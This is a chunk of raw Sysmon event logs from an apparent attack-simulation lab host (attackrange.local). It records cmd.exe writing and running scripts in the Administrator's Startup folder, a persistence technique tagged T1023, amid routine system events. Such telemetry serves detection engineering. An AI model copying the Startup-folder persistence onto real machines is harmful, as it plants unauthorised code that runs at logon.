10341000x80000000000000007971Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.847{266CAFBE-64E2-6064-BB00-00000000AE01}68206840C:\Windows\system32\conhost.exe{266CAFBE-64E9-6064-C500-00000000AE01}6944C:\Windows\system32\findstr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007970Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:49.847{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007969Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.847{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007968Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:49.847{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007967Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.847{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007966Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:49.847{266CAFBE-64C1-6064-9100-00000000AE01}51084328C:\Windows\system32\csrss.exe{266CAFBE-64E9-6064-C500-00000000AE01}6944C:\Windows\system32\findstr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000007965Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.847{266CAFBE-64E2-6064-BA00-00000000AE01}68126816C:\Windows\system32\cmd.exe{266CAFBE-64E9-6064-C500-00000000AE01}6944C:\Windows\system32\findstr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+c3f6|C:\Windows\system32\cmd.exe+4917|C:\Windows\system32\cmd.exe+c378|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000007964Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.851{266CAFBE-64E9-6064-C500-00000000AE01}6944C:\Windows\System32\findstr.exe10.0.14393.0 (rs1_release.160715-1616)Find String (QGREP) UtilityMicrosoft® Windows® Operating SystemMicrosoft CorporationFINDSTR.EXEfindstr /v DELETEME C:\Windows\system32\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=15B171EC73E7B71F4EBB4247E716271E,SHA256=2956F7BC863498DFCC868CE7DF4C9C131A4A5C17B065658456AFEF7566ACE1EE,IMPHASH=D7962312082AAB17974D6817E09E5D7A{266CAFBE-64E2-6064-BA00-00000000AE01}6812C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start 
Menu\Programs\Startup\RunWallpaperSetupInit.cmd" " 10341000x80000000000000007963Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.816{266CAFBE-64E2-6064-BB00-00000000AE01}68206840C:\Windows\system32\conhost.exe{266CAFBE-64E9-6064-C400-00000000AE01}6240C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 11241100x80000000000000007962Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localT10232021-03-31 12:02:49.816{266CAFBE-64E2-6064-BA00-00000000AE01}6812C:\Windows\system32\cmd.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RunWallpaperSetup.cmd2021-03-31 12:02:49.816 10341000x80000000000000007961Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.816{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007960Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:49.816{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007959Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.816{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007958Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:49.816{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007957Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.816{266CAFBE-64C1-6064-9100-00000000AE01}51084328C:\Windows\system32\csrss.exe{266CAFBE-64E9-6064-C400-00000000AE01}6240C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000007956Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:49.816{266CAFBE-64E2-6064-BA00-00000000AE01}68126816C:\Windows\system32\cmd.exe{266CAFBE-64E9-6064-C400-00000000AE01}6240C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+c3f6|C:\Windows\system32\cmd.exe+484b|C:\Windows\system32\cmd.exe+c378|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000007955Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.820{266CAFBE-64E9-6064-C400-00000000AE01}6240C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /S /D /c" type "C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RunWallpaperSetupInit.cmd" "C:\Windows\system32\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-64E2-6064-BA00-00000000AE01}6812C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RunWallpaperSetupInit.cmd" " 23542300x80000000000000007954Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:49.784{266CAFBE-64E2-6064-BC00-00000000AE01}6860ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000007953Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.722{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-64E9-6064-C200-00000000AE01}5080C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007952Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.722{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007951Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:49.722{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007950Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.722{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007949Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:49.722{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007948Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.722{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-64E9-6064-C200-00000000AE01}5080C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000007947Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.722{266CAFBE-64E9-6064-C100-00000000AE01}20763448C:\Windows\system32\cmd.exe{266CAFBE-64E9-6064-C200-00000000AE01}5080C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
154100x80000000000000007946Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.726{266CAFBE-64E9-6064-C200-00000000AE01}5080C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool web list settings --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{266CAFBE-64E9-6064-C100-00000000AE01}2076C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool web list settings --no-log 10341000x80000000000000007945Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.722{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-64E9-6064-C100-00000000AE01}2076C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007944Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:49.706{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007943Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.706{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007942Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:49.706{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007941Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 